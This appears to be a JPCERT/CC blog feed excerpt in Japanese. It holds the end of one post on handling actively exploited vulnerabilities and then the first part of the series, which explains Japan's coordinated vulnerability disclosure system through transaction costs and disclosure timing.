こうした、情報共有、注意喚起、被害組織への個別通知、製品開発者からの連絡、とさまざまな伝達経路を組み合わせ、被害の早期発見や被害拡大防止に取り組みます。これらの手段の組み合わせは、攻撃活動の状況（攻撃キャンペーン中なのか事後なのか）、修正プログラム準備の進捗状況、影響範囲（被害範囲）などに応じて、その組み合わせ方、順番、タイミング等はケースバイケースで判断されます。特定のガイドラインやマニュアルがあるのではなく、攻撃キャンペーンへの対処という観点から柔軟に調整を行っています。 <h5>＜ケースB：海外製品のゼロデイ事案、ケースC：海外製品のNデイ事案＞</h5> 海外製品の脆弱性悪用被害が日本以外で先行して発覚した場合、特に影響がグローバルに波及するような脆弱性の場合、すべてのケースではありませんが、当該国内で対応した専門機関やセキュリティベンダー、メーカーから事前に各国への情報共有が行われ、脆弱性公表と同時に各国において注意喚起が行われるよう、事前調整が行われます。 ケースとしてほとんどありませんが、海外製品の脆弱性悪用被害が日本国内で先行して発覚した場合、発見者から海外メーカーに直接連絡がなされるか、JPCERT/CCを経由した連絡、またはJPCERT/CCを同報した上で海外メーカーに連絡がなされます。 〇脅威動向の変化への対応 従前は、「過去に悪用（ゼロデイ攻撃）されており、脆弱性公表時点では攻撃キャンペーンはすでに終了しているが、他のアクターによる悪用の蓋然性が高いため注意喚起を行う」という対応が行われていました。 他方で、ここ数年で増えてきているケースとして、「（X）注意喚起を行っても攻撃キャンペーンが継続しているもの」「（Y）脆弱性公表からすぐにNデイ攻撃が行われるもの」があります。（図4下段） （X）のパターンについては、正確には、 （X-1）早期に悪用が発覚し、攻撃キャンペーン中に脆弱性公表・注意喚起を行えたケース （X-2）ゼロデイ攻撃が発覚・脆弱性が公表されても攻撃活動が継続されるケース の2種類があります。 前者については、いわゆるIAB的アクター<a href="#fn2">[2]</a>によって広範囲な攻撃が行われることから、その早期発覚の可能性も高まっている背景があると推測されます。後者についてもIAB的アクターによる悪用ケースがほとんどですが、例えば2024年1月の「Ivanti Connect SecureおよびIvanti Policy Secureの脆弱性（CVE-2023-46805およびCVE-2024-21887）」<a href="#fn3">[3]</a>のケースでは、UNC5221が先行するゼロデイ攻撃（2023年12月）に加えて、脆弱性公表＋注意喚起直後も攻撃活動を継続していたことが確認<a href="#fn4">[4]</a>されています。 こうしたIAB的アクターがゼロデイ攻撃／Nデイ攻撃を行うケースでは、ネットワークアプライアンス／エッジデバイスへのWebshell設置等が戦術として好まれることから、侵害されたホストを外形上特定することが可能なケースが多くあります。そのため、攻撃発覚後に多くのセキュリティベンダー／研究者等によりスキャン調査が行われ、「侵害済みホストに関する情報」が国際機関間等で共有されることになります。 JPCERT/CCが調査するケースもありますが、こうした海外提供情報を活用し、すでに侵害されたホストの管理・利用組織への通知オペレーションを注意喚起や情報共有と並行して実施します。 やや余談になりますが、こうしたスキャン情報はレポートやSNSを通じて公開情報として流通することがありますが、実際には脆弱性影響バージョンかどうかの調査が不正確な情報発信もあり、こうした情報の精査も行っています。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E4%B8%BB%E3%81%AB%E6%B5%B7%E5%A4%96%E8%A3%BD%E5%93%81%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E7%99%BA%E7%94%9F%E6%99%82%E3%81%AE%E3%82%BF%E3%82%A4%E3%83%A0%E3%83%A9%E3%82%A4%E3%83%B3.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881661 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E4%B8%BB%E3%81%AB%E6%B5%B7%E5%A4%96%E8%A3%BD%E5%93%81%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E7%99%BA%E7%94%9F%E6%99%82%E3%81%AE%E3%82%BF%E3%82%A4%E3%83%A0%E3%83%A9%E3%82%A4%E3%83%B3-800wri.png" alt="" width="800" height="559"></a> <figcaption>図4：（主に海外製品の）脆弱性悪用発生時の対応のタイムライン</figcaption> </figure> 〇通知オペレーションの実施（特にケースCの場合） 前述のような、すでに侵害されたことが外形上判明しているホスト管理組織への個別通知のほかに、脆弱性公表／注意喚起後も脆弱なままの状態になっているホスト管理組織への通知オペレーションも実施する場合があります。 特に、ExploitやPoCが公表され、広く不特定多数のアクターが悪用可能な状態であったり、前述のような、IAB的アクターが継続して攻撃キャンペーンを展開する可能性があったりするケースにおいて、未被害・脆弱なホスト管理組織への通知オペレーションを実施しています。 あらゆるケースで脆弱なままのホスト管理組織への通知を行っているわけではありません。基本的に脆弱性対応については、一義的には製品開発者等からユーザーへの伝達と脆弱性修正対応がなされるべきであって、ユーザー（あるいはその委託等を受けた組織）自身での機器管理・脆弱性情報把握が行われるべきと考えているからです。 他方でこれまでもブログ記事で触れてきた通り、市場／商流上の脆弱性情報流通には課題<a href="#fn5">[5]</a>があるところ、上記のような攻撃の蓋然性が高まっている、あるいはすでに攻撃キャンペ―ン中であるという状況においては、通知オペレーションを行わざるを得ない、というのが実情です。 <h4> </h4> <h4>今後の課題</h4> <hr> ここまで、脆弱性悪用に対する現行のJPCERT/CCでのオペレーションを紹介しましたが、さまざまな課題もあるところ、今後、脆弱性対応制度や能力の改善に向けた動きが出てくる可能性があります。 昨年11月に公表された、サイバー安全保障分野での対応能力の向上に向けた有識者会議による「サイバー安全保障分野で対応能力の向上に向けた提言」（以下、「提言」という。）<a href="#fn6">[6]</a>では、脆弱性対応や注意喚起等の情報発信についていくつか言及がなされています。有識者会議で取り上げられた提言を中心に、現状のオペレーション上の課題と今後の論点について簡単に考察してみます。 <h5> ＜緊急性の高い情報発信に関するワンボイス化について＞</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>（省略）現在、内閣サイバーセキュリティセンター（NISC）のほか、警察・経済産業省・JPCERT/CC・情報処理推進機構等が個別に情報発信を行っているが、特に緊急性の高い情報発信について機関ごとに差異が生じないよう、ワンボイスで行われるべきである。（提言3ページ）</td> </tr> </tbody> </table> 現行では（JPCERT/CCからの情報も活用いただきつつも）各機関が独自の情報発信を行っており、同じ脆弱性について注意喚起を出す／出さない判断が分かれる場合も散見されます。発信内容の「温度感」や技術的内容に差異があるような、個別バラバラな情報発信は改善しなくてはなりませんが、他方で、「ワンボイス化」の論点としては以下の点を挙げることができます。 〇スピード感の問題 前述のとおり、影響範囲の大きい、特に海外製品の脆弱性の悪用ケースについては、公表後1日以内での注意喚起発行を行っています<a href="#fn7">[7]</a>。例えば注意喚起の検討段階で複数機関間の検討プロセスを設けた場合、スピードが落ちる可能性や、立場上の意見が異なった場合にある程度妥協した内容が発信情報として採用されてしまう恐れがあります。 〇複数機関が発信・対応することのメリット 何かしらすり合わせをした情報発信が行われる必要がある一方、発信組織を必ずしも一つにする必要はありません。「ワンボイス」は必ずしも対応組織を一本化することと同義ではありません。例えば行政学の分野では、複数機関による冗長性があることで過誤の発生を抑制し、また、環境変化への適応性が高まる点が指摘<a href="#fn8">[8]</a>されています。また、現行の体制においても、各機関からの発信情報や支援が届くリーチ範囲はそれぞれ異なっており、重複による受信者負担等を解消しなければならない課題があるものの、冗長性の観点で捉えると重層的な対処体制と解釈することもできます。 <h5>＜悪用に関する情報の取り扱いについて＞</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>毎年多くの脆弱性が公表されるなか、利用者が膨大な脆弱性情報の中から優先的に対応すべきものを特定できるよう、政府は、米国政府が公表している「既知の悪用された脆弱性カタログ」を参考に、国内で悪用されている脆弱性情報を一元的に分かりやすく発信すべきである。（提言3ページ）</td> </tr> </tbody> </table> 〇温度感が不明瞭な点 現行のKEVでは、ランサムアクターによる悪用有無が示されるものの、当該悪用がいつの時点の事象なのか、現時点で攻撃キャンペーンが継続中なのか、また、今後の悪用の蓋然性があるのかどうかなどが示されていません。また、悪用のエビデンスとして、セキュリティベンダーの分析レポートも紐付いていません。 〇国内制度における取り組みの周知不足 情報セキュリティ早期警戒パートナーシップにおいて、2023年度の「情報システム等の脆弱性情報の取扱いに関する研究会」による検討結果を踏まえて、悪用を示す情報の取り扱いに関する規定が新たに定められ、関連する告示改訂も行われています<a href="#fn9">[9]</a>。すでに2024年度から運用が始まっており、JVNに掲載された国内製品については、その悪用有無に関する情報が掲載されるケースが徐々に増えてきています。有識者検討会では本制度運用について言及がありませんでしたが、まずは本制度運用の周知強化の課題に取り組む必要があると考えます。 <h5>＜スキャン、通知オペレーションについて＞</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>外部からのスキャンによって脆弱性を把握し、注意喚起をすることも効果的と考えられるが、精度が低い場合には、注意喚起の対象となった組織の過度な負担になってしまうことにも留意すべきである。（提言4ページ）</td> </tr> </tbody> </table> 注意喚起を巡る受信組織側のコスト負担については、先に紹介した以前のブログ記事<a href="#fn10">[10]</a>にて解説のとおりですが、通知オペレーションについても同様の課題があります。通知はJPCERT/CCだけが行っているものではなく、また、組織だけでなく個人も含めて国内外で多くの「通知」が行われています。よく見られる問題として、侵害されていると判断した根拠（技術的証拠）が不明瞭なケースや、侵害の調査方法や調査に必要な情報（タイムスタンプなど）が示されない／サポートされない“一方通行”的な通知ケースがあります。 特に、悪用されている攻撃キャンペーンを観測・対応した組織ではない組織／個人が侵害調査方法を知り得てスキャン調査と通知をするケースでは、通知対象組織への提供情報が限定的であったりサポートが不十分であったりするケースが見受けられます。また、こうした発見者／調査者の情報を単に仲介するだけの組織による通知活動においても同様の問題が散見されます。 ※数多く行っているJPCERT/CCからの通知オペレーションにおいても、諸事情により調査に必要な技術的情報を完全に提供しきれていないと反省するケースが残念ながらあります。ご意見・クレーム等あればいつでもお寄せいただければと思います。 <h5>＜情報発信だけ行われる問題点について＞</h5> 有識者提言では触れられませんでしたが、情報発信「後」の取り組みについても課題があります。本稿前半で解説のとおり、JPCERT/CCから注意喚起や情報共有、通知オペレーションを行った場合、侵害有無調査に必要な情報提供のほか、侵害疑義が見つかった組織からのインシデント相談にも対応しています。本稿でも取り上げたようにここ数年で増加しているネットワークアプライアンス／エッジデバイス関連の脆弱性悪用事案では、当該侵害機器のフォレンジック調査に課題があります。IAB的アクターは国際的に広範囲の機器に対して攻撃を行う一方、製品の多くでは運用保守ベンダーでは詳細な調査ができないためメーカーへの調査依頼が殺到し、速やかに回答を得られないケースが散見されています。また、こうした攻撃では機器の侵害後に横展開されるかどうか調査が不足しているケースも多く見受けられるため、注意喚起を出して終わりではなく、その後の調査までサポートが必要になります。 現状では、情報発信をするすべての機関があらゆる製品に対してこうした調査まで行う能力・リソースを有しているわけではないため、国全体としての対応にバラつきが出てしまっている次第です。 <h5>＜公表前の脆弱性情報／悪用情報の取り扱いについて＞</h5> こちらも有識者提言では触れられなかったポイントです。現行の国内制度上は、公表前の脆弱性の詳細に関する情報はごく限られた関係者（IPA、JPCERT/CC、メーカー、発見者）間で取り扱いがなされます。例外はあり、2017年からは政府と一部の重要インフラ事業者に対して公表前の優先的な情報提供（「優先情報提供」）<a href="#fn11">[11]</a>が整備されています。 こうした「優先的な（公表前の）情報提供」については日本のような制度的なものではないものの、例えば海外においてはMicrosoft社がベンダー等に公表前の脆弱性情報提供行うMAPP（Microsoft Active Protections Program）<a href="#fn12">[12]</a>があります。 他方で、こうした公表前の事前情報提供については公表前の情報漏えい疑義のトラブルも発生<a href="#fn13">[13]</a>しています。現行の国内制度では、優先的な情報提供先は現時点で限られていることや、詳細な情報については調整フェーズ（基本的に発見者―JPCERT/CC―メーカー間のやり取り）内で扱われていることから、罰則規定のない取り扱い制度とはいえ、万が一不適切な扱いがあった場合に原因となった組織等を比較的特定しやすい体制にはなっています。他方で、2023年度の「情報システム等の脆弱性情報の取扱いに関する研究会」でJPCERT/CCから意見<a href="#fn14">[14]</a>を表明していますが、優先情報提供を拡充することへのメーカー側からの懸念が出ており、今後、公表前の脆弱性情報の扱いについてプレーヤー等が増えるのであれば、情報漏えい対策の議論がさらに必要になります。 <h4> </h4> <h4>さいごに</h4> <hr> 日本は世界的にも珍しく、公的な制度の元で官民連携による脆弱性情報のハンドリングが行われてきました。海外においては、基本的に発見者―メーカー間の直接／個別の調整が行われてきた結果、意図しない情報開示などのトラブルが度々起きてきました。他方で、JPCERT/CCが日々国際連携している中で見えている範囲では、海外において、脆弱性の悪用に関する情報の流通度は日に日に高まってきているように見えます。悪用情報に触れるプレーヤーがこれまでのさまざまな脆弱性情報ハンドリングの失敗を経験しながらも、徐々に相場観を形成し、自発的に足並みを揃え始めているのではないかと考えています。 日本においては脆弱性告示制度のもとで、特に公表前の脆弱性悪用に関する情報を流通させるプレーヤーがある意味限定されてきた経緯があるわけですが、一方で、今後は脆弱性悪用情報に触れる／発信するプレーヤーが増えていくことが想定されます。 今年5月にいわゆるサイバー対処能力強化法と同整備法が成立しましたが、強化法第42条では脆弱性のある製品のベンダー等に対して、「サイバー攻撃による被害を防止するために必要な措置を講ずるよう要請する」ことや、改正されたサイバーセキュリティ基本法第7条において、責務規定（利用者のサイバーセキュリティ確保のための設計・開発、情報の継続的な提供等に努める旨）が追加<a href="#fn15">[15]</a>されました。今後、行政機関やベンダーの役割が拡大されていく中で、脆弱性の公表だけでなく、悪用情報がどのように扱われ、ユーザーが調査のために必要な技術的情報がどのようなタイミングでどのような手段によって提供されるべきか、今後の議論にJPCERT/CCのこれまでの知見を積極的にインプットしていきたいと考えています。 <h4> </h4> <h4>参考文献等</h4> <a name="fn1"></a>[1]経済産業省「脆弱性関連情報取扱体制」https://www.meti.go.jp/policy/netsecurity/vulinfo.html <a name="fn2"></a>[2]IABというと、いわゆるクライム系アクターの一分類として扱われてきましたが、近年、APTキャンペーンにおいて分業制が採られるケースが増えており、APTキャンペーンにおける”IAB”的アクターを定義する動きもあります。Cisco Talos,"Redefining IABs: Impacts of compartmentalization on threat tracking and modeling", https://blog.talosintelligence.com/redefining-initial-access-brokers/ <a name="fn3"></a>[3]2024/1/11 JPCERT/CC 「Ivanti Connect SecureおよびIvanti Policy Secureの脆弱性（CVE-2023-46805およびCVE-2024-21887）に関する注意喚起」https://www.jpcert.or.jp/at/2024/at240002.html <a name="fn4"></a>[4]2024/4/5 Google/Mandiant, “Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies”, https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en <a name="fn5"></a>[5]JPCERT/CC Eyes 「なぜ、SSL-VPN製品の脆弱性は放置されるのか～“サプライチェーン”攻撃という言葉の陰で見過ごされている攻撃原因について～」https://blogs.jpcert.or.jp/ja/2022/07/ssl-vpn.html <a name="fn6"></a>[6]https://www.cas.go.jp/jp/seisaku/cyber_anzen_hosyo/koujou_teigen/teigen.pdf <a name="fn7"></a>[7]海外機関―ベンダー間の調整前後で、公表前に情報共有がなされるケースもあります。 <a name="fn8"></a>[8]鈴木潔「新型コロナウィルス感染防止対策における行政組織間の連携―冗長性・他機関連携・リーダーシップ―」（年報行政研究57「行政における冗長性」収録） <a name="fn9"></a>[9]https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html <a name="fn10"></a>[10]JPCERT/CC Eyes：注意喚起や情報共有活動における受信者側の「コスト」の問題について－情報発信がアリバイや成果目的の自己目的化した行為にならないために― https://blogs.jpcert.or.jp/ja/2023/05/cost-and-effectiveness-of-alerts.html <a name="fn11"></a>[11]優先情報提供については、早期警戒パートナーシップガイドラインをご参照ください。 https://www.ipa.go.jp/security/guide/vuln/ug65p90000019by0-att/partnership_guideline.pdf また、過去の検討経緯はIPAのHPで公開されている、過去の「情報システム等の脆弱性情報の取扱いに関する研究会」報告書でご覧いただけます。https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html <a name="fn12"></a>[12]https://www.microsoft.com/en-us/msrc/mapp <a name="fn13"></a>[13]2025年7月にゼロデイ攻撃が発覚・公表となった、Microsoft Sharepointの脆弱性（CVE-2025-53770等）について、MAPP経由で事前に情報が漏えいした可能性が指摘されていることについてブルームバーグ紙が報じました。現時点で本件の結論等はまだ不明ですが、同様の指摘は2021年のMicrosoft Exchange Serverの脆弱性（いわゆるProxyshell）についてもWSJ紙が報じた経緯があります。 <a name="fn14"></a>[14]「情報システム等の脆弱性情報の取扱いに関する研究会」2023年度報告書33ページ　https://www.ipa.go.jp/security/reports/vuln/nq6ept000000ldxx-att/report2023.pdf <a name="fn15"></a>[15]https://www.cyber.go.jp/pdf/council/cs/dai43/43shiryou4.pdf
解説：脆弱性関連情報取扱制度の運用と今後の課題について（前編）～公益性のある脆弱性情報開示とは何か～

Fri, 12 Sep 2025 04:30:00 -0000

※脆弱性関連情報取扱制度は経済産業省およびIPAとともに運用していますが、本稿は...

※脆弱性関連情報取扱制度は経済産業省およびIPAとともに運用していますが、本稿はJPCERT/CCとして執筆したものです。 日本では、「情報セキュリティ早期警戒パートナーシップ」<a href="#fn1">[1]</a><a href="#fn2">[2]</a>に基づく運用を20年以上行ってきた実績があり、各国に先んじて、いわゆる「協調された脆弱性開示（CVD）」への取り組みが官民連携で行われてきました。しかし、残念ながら、制度運用への理解が十分に広まっていないことを示すような出来事が度々発生しています。単に法律やガイドラインに書いてあることを解釈するだけでなく、「なぜこの仕組みは存在するのか／必要とされているのか」を考察しなければ、制度（や制度の維持）という「手段」が自己目的化し、形骸化、あるいは硬直化し実態にそぐわなくなる恐れがあります。  多くの発見者、製品開発者が脆弱性調整に関わるようになったとはいえ、社会／業界全体からすると、多くの組織／人にその対応経験が十分にあるわけではありません。インシデント対応と同様に、公表される内容、経緯は一部であり、その調整過程や詳細は限られた関係者にしか知られない世界です。本稿では、制度上の「調整機関」として、また、悪用時のインシデント対応支援を行うJPCERT/CCの観点から、対応現場側の課題と今後について考察してみたいと考えています。「前編」では、まだ悪用の蓋然性がない、“平時”の脆弱性調整について解説し、後編では脆弱性が悪用される蓋然性が高まっている、あるいはすでに悪用された場合の各種オペレーションについてご紹介したいと思います。 なお、脆弱性関連情報の取扱いを巡る法的な観点でのさまざまな論点の整理については、高橋郁夫弁護士らによる「情報システム等の脆弱性情報の取扱いにおける法律面の調査報告書改訂版」<a href="#fn3">[3]</a>がIPAのWebサイトで公開されていますので、まずはこちらをご参照ください。 <h4> </h4> <h4>平時の対応について</h4> 前述のとおり、日本では「情報セキュリティ早期警戒パートナーシップ」制度に基づき、各国に先んじて、いわゆる「協調された脆弱性開示（CVD）」への取り組みが官民連携で行われてきました。 海外においては、基本的に発見者―メーカー間で直接／個別の調整が行われてきた結果、意図しない情報開示などのトラブルが度々起きてきました。「メーカーが脆弱性であると認めないから情報開示する」「公益性が高いと判断し公表する」といった主張にて、両者の協調に依らない情報開示が度々行われてきました。あるいは、発見者が脆弱性について指摘していたにも関わらずメーカー側から誠実な対応が得られなかったというトラブルも度々起きてきました。他方で、最近では国としてCVDを推進したり、メーカーとして対応方針を宣言する組織も増え、また、脆弱性情報に触れるプレーヤーがこれまでのさまざまな脆弱性情報ハンドリングの失敗を経験しながらも徐々に相場観を形成し、自発的に足並みを揃えつつある状況です。 脆弱性情報というものは、メーカーにとってはネガティブな情報であり、一方で発見者にとってはその活動成果や能力を示すポジティブな情報です。ユーザーにとっては、問題が解消されるポジティブな情報ですが、コントロールされない情報開示が悪用につながればネガティブな情報となります。そうした中で、日本の脆弱性情報の取り扱い制度においては、調整後のメーカーからの公表を基本とし、また、公表時（JVN掲載）には発見者を明記することができるようになっています。JVNという場を使い、メーカーとしての情報開示、発見者としての情報開示がスムーズに連動できるようになっているのです。 以前のブログ記事<a href="#fn4">[4]</a>でも解説したとおり、こうした仕組みは、情報を効率よく活用し、どこか一個人／一組織だけのために“消費”され、他者の不利益が発生するような、負の外部性を可能な限り避けるための仕組みと言えます。 <h4> </h4> <h4>調整制度はなぜ存在するのか</h4> 脆弱性を悪用する攻撃者と悪用された製品のメーカーとの関係は「加害者」と「被害者」の関係になりますが、他方で、脆弱性の発見者とメーカーとの関係はそうではありません。こうした、「加害者」「被害者」だけの図式で捉えられない利害の衝突へのアプローチとして、経済学や法学の分野では「コースの定理」という考え方が用いられることがあります。当事者間の私的な取り引きを通じて「最も効率的な結果が達成される」という定理を、コースの定理といいます。 <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td> 取引費用が十分に小さいとき、権利の境界や所在が明確で、約束が強制されるのであれば、法的ルールが権利をどのように割り当てるとしても、最終的な資源配分は変わらない（当事者の私的な取引を通じて、最も効率的な結果が達成される） （出典：飯田高『法と社会科学をつなぐ』（有斐閣）136ページ） </td> </tr> </tbody> </table> ※ちなみに、本来、コースの定理は公害などの外部不経済に対して、当事者間で調整・解説するための考え方として使われるものであり、脆弱性の発見者とメーカーとの関係では厳密には外部不経済とは言えませんが、その解決アプローチは援用できると考え、引用しています。 取引費用というのは「取引を行う際に生じる費用の総称であり、取引の相手方を探す費用、交渉の実施や合意書作成の費用、履行の監視や違反に対する制裁の費用、戦略的行動に伴う費用」<a href="#fn5">[5]</a>というもので、これを脆弱性調整の作業に当てはめると、 「取引の相手方を探す費用→メーカーの適切な交渉窓口を探すコスト」 「交渉の実施や合意書作成の費用→発見者の主張とメーカー側の主張の着地点を探す（検証）作業」 「履行の監視や違反に対する制裁の費用→公表までの進捗管理」 「戦略的行動に伴う費用→発見者の目的（カンファレンス発表、自社能力のアピール、公益目的等）とメーカーの戦略（レピュテーションダメージの最小化）との間の調整」 といったところになるかと思います。コースの定理は脆弱性調整のように多くの取引費用が発生する場合では「何らかのルールや制度が必要」であることを示唆する理論ともいえます。調整制度がなく、発見者―メーカー間で交渉を行う場合、あらゆる取引費用をお互いが負担することになるわけですが、両者間にはもともと信頼関係がなく（むしろ、最初から主張や利害が衝突していることがある）、さらに脆弱性やセキュリティ技術への知見や情報にも非対称性（メーカーが必ずしもセキュリティに詳しくない場合もあれば、発見者が当該製品について技術的に詳しくないこともある）があります。あまりにも取引コストが高すぎるため、調整が難航し、取引コストを負担せずに個別の目的（例：脆弱性を知らしめること）を達成（例：合意に至らない一方的情報開示）しようとする動きが出てしまうわけです。 脆弱性情報の取り扱い制度は、あらかじめ取扱いルールを示し、調整役を設けることで、こうした双方の取引コスト負担を減らし、交渉を効率よく進めるための制度だと考えることができます。初めて脆弱性を発見する発見者／修正対応するメーカーにとってだけでなく、何度もこうした制度を使うプレーヤーにとっても、制度を使うほど取引費用を減らし、効率化を進めることができるというメリットもあります。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B31_%E8%84%86%E5%BC%B1%E6%80%A7%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E8%AA%BF%E6%95%B4%E5%88%B6%E5%BA%A6%E3%81%AE%E6%84%8F%E5%91%B3.png" class="mt-asset-link"><img class="asset asset-image at-xid-3861096 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B31_%E8%84%86%E5%BC%B1%E6%80%A7%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E8%AA%BF%E6%95%B4%E5%88%B6%E5%BA%A6%E3%81%AE%E6%84%8F%E5%91%B3-800wri.png" alt="" width="800" height="350"></a> <figcaption>図1_脆弱性情報開示における調整制度の意味</figcaption> </figure> <h4> </h4> <h4>「脆弱性の存在を示せば」それで対策は進むのか</h4> 「脆弱性の存在を明らかにして注意喚起をする」ということであれば、制度以前、あるいはかつての海外側がそうだったように、各自がそれぞれの判断の基で情報開示をすることが「最短ルート」に思えます。問題は、「では、どうやって修正するのか」という観点です。 コンシューマー製品の脆弱性対応の多くでは、公表と同時に修正プログラムの配布を行い、メーカーからの公表等を通じてユーザーに適応を呼びかけるケースが大半です。 他方で、法人向け製品では、修正プログラムや暫定的な回避策／被害軽減策の提供を先んじてユーザー組織に個別通知し、ある程度リスクを低減したところで公表を行うというケースがよく行われています。 これは、「コンシューマーよりも法人向け製品の方が確実にコミュニケーションできる手段があるから」<a href="#fn6">[6]</a>という実務的な背景もありますが、そうしたユーザーの対象製品が侵害されることで、さらにそのユーザー法人の顧客／ステークホルダーなどに影響が出ることが想定されるため、万が一公表後に悪用する攻撃が発生した場合に備えて、暫定的な対応を先んじて行っておきたいという考え方があるからです。 また、法人向けの製品の場合、修正プログラムを瞬時に適用できるケースは少なく、顧客やステークホルダーに影響がある場合、システム停止や修正前のパッチテスト等、多くの工程／リソース投入／コストが発生することから、本格的／根本的な修正を行うまでの暫定的措置が極めて重要です。 一方で、ここまではあくまで「平時」の想定です。悪用がすでに発生している場合、あるいは悪用される蓋然性が高まっている場合はまた異なったタイムラインでの動きが必要になりますが、これは後編で解説したいと思います。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B32_%E4%BF%AE%E6%AD%A3%E5%AF%BE%E5%BF%9C%E3%81%AB%E5%BF%85%E8%A6%81%E3%81%AA%E6%9C%9F%E9%96%93.png" class="mt-asset-link"><img class="asset asset-image at-xid-3861097 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B32_%E4%BF%AE%E6%AD%A3%E5%AF%BE%E5%BF%9C%E3%81%AB%E5%BF%85%E8%A6%81%E3%81%AA%E6%9C%9F%E9%96%93-800wri.png" alt="" width="800" height="390"></a> <figcaption>図2_修正対応に必要な期間</figcaption> </figure> <h4> </h4> <h4>脆弱性公表による「価値の総量」</h4> 脆弱性調整について、基本的に発見者もメーカーも「開示」するという目的ではベクトルが一致しています。ただ、問題になるのはその（期待する）「タイミング」が異なるという点です。 本来、お互いが望んだ公表タイミングがあり、これがズレた分だけ、片方側の不利益になります（図3のとおり）。前述のとおり、修正作業にはメーカー内でもまたユーザーサイドでも相当の期間を必要とすることが多いため、基本的にメーカーが希望する公表タイミングというものは発見者が望む公表タイミングよりは時間軸的に後ろになりがちです。他方で、発見者側にも事情<a href="#fn7">[7]</a>はあり、例えば、国際カンファレンスでの発表を予定している場合などがあります（※しつこいですが、悪用の蓋然性が高まっている、あるいはすでに悪用が発生している場合は事情が異なります。後編で解説します）。この調整もまた、前述のとおり、取引コストがかかるため、調整制度を用いて、この取引コストを減らし、お互いの妥協点となる公表タイミングを調整するわけです。 こうした調整は、発見者、メーカーの「二者それぞれの利益」だけを調整するというものではないことに注意が必要です。脆弱性が適切に開示されなければ、悪用等を惹起したり、メーカーもさることながら、製品のユーザー側で本来の修正タイミング・リソースが大きく変化することでのコスト負担、経済的損失など、ユーザーや社会インフラ全体が不利益を被ったりする可能性があるわけです。前述のコースの定理が示すのは「価値の総量」をどう分配できるかという観点であり、脆弱性情報の取り扱い制度もまた、社会全体としての脆弱性開示による利益を得るための制度であると考えることができます。 脆弱性情報開示の議論において、よく「公益性」という用語が使われているのを散見しますが、二者間の直接交渉がどうしても「二者間の利益の調整」に陥りがちです。ここまでに述べたとおり、社会全体での「価値の総量」を調整するためには、効率的な調整ができる、脆弱性告示制度に基づいた調整が望ましいと筆者は考えます。 前項に同じく、ここまでの整理はあくまで悪用がまだ確認されておらず、また、悪用の蓋然性も高まっていない状態での「平時」での整理です。悪用がすでに発生している、または差し迫った脅威があるという場合はまた異なった判断軸が必要になるわけですが、こちらも後編で解説したいと思います。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B33_%E5%90%84%E3%83%97%E3%83%AC%E3%83%BC%E3%83%A4%E3%83%BC%E3%81%AE%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%82%BF%E3%82%A4%E3%83%9F%E3%83%B3%E3%82%B0%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%83%E3%83%97_%E4%BF%AE%E6%AD%A32.png" class="mt-asset-link"><img class="asset asset-image at-xid-3876912 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B33_%E5%90%84%E3%83%97%E3%83%AC%E3%83%BC%E3%83%A4%E3%83%BC%E3%81%AE%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%82%BF%E3%82%A4%E3%83%9F%E3%83%B3%E3%82%B0%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%83%E3%83%97_%E4%BF%AE%E6%AD%A32-640wri.png" alt="" width="640" height="638"></a> <figcaption>図3_各プレーヤーの開示タイミングのギャップ</figcaption> </figure> <h4>前編のまとめ：予測可能性を担保する制度</h4> 世界的にも珍しい制度が、強い義務や罰則等のない仕組みとしてこの20年以上運用できたのは、ひとえに官民各プレーヤーの理解と協力があったからです。特に重要なのは、脆弱性というものに対する技術的な理解と製品が提供・利用されているという現場側の事情の双方をエンジニアや研究者が理解し、また、さまざまな公的機関やメディアが仕組みの利点を理解しているからこそ成立している仕組みなのです。 前述のとおり、海外ではメーカーとの合意に至らないまま脆弱性情報を開示してしまうトラブルが多く発生していますが、仮に多少強引な方法であったとしても「公益性の観点から開示が望ましい」として、「目的が手段を正当化する」的な擁護の声も見受けられます。しかし、こうしたアプローチは（発見者も含めて）長期的に不利益を生むことになると考えます。 